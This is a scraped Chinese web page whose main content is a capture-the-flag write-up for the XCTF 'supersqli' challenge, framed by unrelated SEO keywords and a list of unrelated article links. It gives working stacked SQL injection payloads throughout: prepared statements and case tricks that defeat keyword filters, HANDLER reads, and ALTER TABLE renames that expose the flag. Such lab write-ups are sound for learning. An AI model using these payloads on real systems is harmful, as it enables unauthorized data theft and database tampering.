当前位置: 首页 > news >正文

网站跳转到另外一个网站怎么做宁波seo网络推广服务商

网站跳转到另外一个网站怎么做,宁波seo网络推广服务商,wordpress感兴趣推送,wordpress占用服务器内存XCTF_Web_高手进阶区 supersqli supersqli 这里使用谷歌浏览器 拿到题目后,发现是单引号报错字符型注入 用order by语句判断出两个字段:order by 2的时候页面正常回显,order by 3的时候页面出错。 使用union select联合查询,发现…

XCTF_Web_高手进阶区

  • supersqli

supersqli

这里使用谷歌浏览器
拿到题目后,发现是单引号报错字符型注入
在这里插入图片描述
用order by语句判断出两个字段:order by 2的时候页面正常回显,order by 3的时候页面出错。
使用union select联合查询,发现关键字select被正则过滤了
在这里插入图片描述
因此,需要绕过select的过滤
解法一:
(1)堆叠注入/?inject=-1’;show tables --+
在这里插入图片描述
(2)发现了两张表,分别查询两张表中的字段,
/?inject=-1’;show columns from 1919810931114514 --+
在这里插入图片描述
/?inject=-1’;show columns from words --+
在这里插入图片描述
(3)发现了flag在第一个表中,接下来就是要查看flag的内容了。但是select被过滤了,这里可以采用预编译的方式绕过。

?inject=-1';set @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepare aaa from @sql;EXECUTE aaa;#

在这里插入图片描述
(4)这里用strstr函数过滤了’set’和’prepare’关键词,利用strstr不能区分大小写,将其改为大写即可

/?inject=-1';sEt @sql = CONCAT('sele','ct * from \`1919810931114514\`;');prepArE aaa from @sql;EXECUTE aaa;#

或者

/?inject=-1';sEt @sql = CONCAT('se','lect * from \`1919810931114514\`;');prEpare stmt from @sql;EXECUTE stmt;#

或者

/?inject=-1';use supersqli;set @sql=concat('s','elect * from \`1919810931114514\`');PREPARE pre FROM @sql;EXECUTE pre;--+

在这里插入图片描述
解法二:
handler查询
在查找到有两张表的前提下进行
(1)使用方法:
handler table_name open打开一张表
handel table_name read first读取第一行内容,
handel table_name read next依次获取其它行

/?inject=-1';handler `1919810931114514` open;handler `1919810931114514` read first;#

在这里插入图片描述
解法三:
(1)修改表名和列名,在查找到两个表后,看一下第二个表
在这里插入图片描述
(2)其中有一个列就是data列,是可以进行查询的。所以这里将表1919810931114514名字改为words,flag列名字改为id,就可以查询flag的内容了。

1'; alter table words rename to aaaa;alter table `1919810931114514` rename to words;alter table words change flag id varchar(100);#

其中:
alter table words rename to aaaa;先把原来的words表名字改成别的,这个随便
alter table`1919810931114514` rename to words;将表1919810931114514的名字改为words
alter table words change flag id varchar(100);将改完名字后的表中的flag改为id,字符串尽量长点
(3)然后用1’ or 1=1 --+直接就能得到正确结果
在这里插入图片描述

http://www.yayakq.cn/news/409116/

相关文章:

  • 网站二级导航制作河南网站建设公司|河南网站建设价格费用
  • 邯郸网站设计招聘网站开发
  • 重庆在百度做个网站多少钱html 网站根目录
  • 网站开发人员的岗位职责端端网站开发
  • 区块链技术做网站国外推广都是怎么推广
  • 能自己做生物实验的网站制作一个网站的步骤
  • 网站建设公司 跨界鱼科技专业wordpress 数据库表可视化
  • 电商网站建设与运行曲靖市网站建设
  • 杭州建设局网站首页泉州网站建设方案服务
  • 网站建设有前途吗哪些购物网站有做拼团活动
  • 政务网站建设工作总结微信商户平台开发
  • 做网站需要那些软件网站换行代码
  • 无锡网站制作平台唯品会官网一家做特卖的网站
  • 长沙门户网站建设公司记事本做网站的流程
  • 网站错位网站如果建设
  • 杭州小程序开发费用seo外包公司哪家好
  • 苏州网站制作排名优化成都公司网页制作服务电话
  • 哈尔滨住房和城乡建设厅网站百度做的网站后台怎么进
  • 做视频的软件模板下载网站有哪些内容wordpress固定菜单栏
  • 建10个网站wordpress没有图片
  • 专业团队优质网站建设方案网络推广网址
  • 手机网站 搜索优化 百度北湖区网站建设专业
  • 网站优化一般怎么做商标可以做网站吗
  • 营销管理培训课程深圳短视频seo教程
  • 运城手机网站建设网站包括哪些内容
  • 网站开发专业前景网站建设要那些东西
  • 视频网站用什么做的包头爱出行app最新版本
  • wordpress mysql分离网站优化及推广
  • 网站建设销售工资网站建设和系统集成
  • 成都html5网站建设电子商务师证官网